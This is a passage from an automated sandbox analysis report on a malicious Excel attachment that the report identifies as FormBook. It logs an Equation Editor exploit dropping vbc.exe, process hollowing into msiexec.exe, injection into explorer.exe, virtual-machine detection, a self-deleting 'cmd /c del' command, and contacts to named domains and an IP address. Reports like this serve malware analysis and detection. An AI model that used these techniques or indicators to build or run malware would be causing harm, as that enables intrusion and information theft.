      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F900 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0060 NtQuerySection,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A10D0 NtOpenProcessToken,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1148 NtOpenThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A010C NtOpenDirectoryObject,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A01D4 NtSetValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F8CC NtWaitForSingleObject,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F938 NtWriteFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1930 NtSetContextThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FA50 NtEnumerateValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FA20 NtQueryInformationFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAB8 NtQueryValueKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FB50 NtCreateKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FBE8 NtQueryVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC48 NtSetInformationFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0C40 NtGetContextThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC30 NtOpenProcess,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FD5C NtEnumerateKey,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1D80 NtSuspendThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FE24 NtWriteVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FF34 NtQueueApcThread,
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FFFC NtCreateProcessEx,
      Source: C:\Users\Public\vbc.exeCode function: 5_1_004185E0 NtCreateFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_1_00418690 NtReadFile,
      Source: C:\Users\Public\vbc.exeCode function: 5_1_00418710 NtClose,
      Source: C:\Users\Public\vbc.exeCode function: 5_1_004187C0 NtAllocateVirtualMemory,
      Source: C:\Users\Public\vbc.exeCode function: 5_1_004187BC NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F00C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F07AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFB50 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EF900 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EF9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFD8C NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F0048 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F0060 NtQuerySection,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F0078 NtResumeThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F10D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F1148 NtOpenThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F01D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFAD0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFAB8 NtQueryValueKey,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EF8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EF938 NtWriteFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F1930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F0C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024EFD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024F1D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A85E0 NtCreateFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A8690 NtReadFile,
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A8710 NtClose,
      Source: winlogon[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: Quotation Request - Alligator Pty Ltd.xlsxReversingLabs: Detection: 31%
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Quotation Request - Alligator Pty Ltd.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF131.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/24@4/4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
      Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.541236797.00000000002DA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.541224912.00000000002C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.543131864.00000000025C0000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.481808621.00000000004A0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.542128053.0000000000910000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483202698.0000000000600000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.541453296.0000000000790000.00000040.00000001.sdmp, msiexec.exe
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001C365 push ecx; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B822 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B82B push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B88C push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B7D5 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007ADFA1 push ecx; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B822 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B82B push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B88C push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B7D5 push eax; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_024FDFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB7D5 push eax; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB82B push eax; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB822 push eax; ret
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB88C push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exeJump to dropped file
      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nspBFD8.tmp\uoqeqjqp.dllJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1156Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_022166E8 rdtsc
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C22 FindFirstFileA,FindClose,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
      Source: explorer.exe, 00000006.00000000.501680336.000000000456F000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000006.00000000.501680336.000000000456F000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exe, 00000004.00000002.483703319.00000000008B4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: explorer.exe, 00000006.00000000.527699949.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000006.00000000.493942706.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000006.00000000.501732791.000000000457A000.00000004.00000001.sdmpBinary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001AD6A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001AD6A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10007CE0 SetEnhMetaFileBits,SetWinMetaFileBits,GetDC,CreateDIBitmap,ReleaseDC,GetProcessHeap,HeapFree,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_022166E8 rdtsc
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0018EA3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0018EA7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0018EAB8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0018E776 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0018E98A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 5_2_007B26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025026F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B40 LdrLoadDll,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_1001CB66 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.subsoilcorp.com
      Source: C:\Windows\explorer.exeDomain query: www.travelgleam.com
      Source: C:\Windows\explorer.exeDomain query: www.ll1ysq.biz
      Source: C:\Windows\explorer.exeNetwork Connect: 162.210.195.97 80
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 610000
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
      Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 1764
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
      Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: EXCEL.EXE, 00000000.00000002.683438687.00000000008A0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.487912526.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\Public\vbc.exeCode function: 4_2_10019C0D cpuid
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
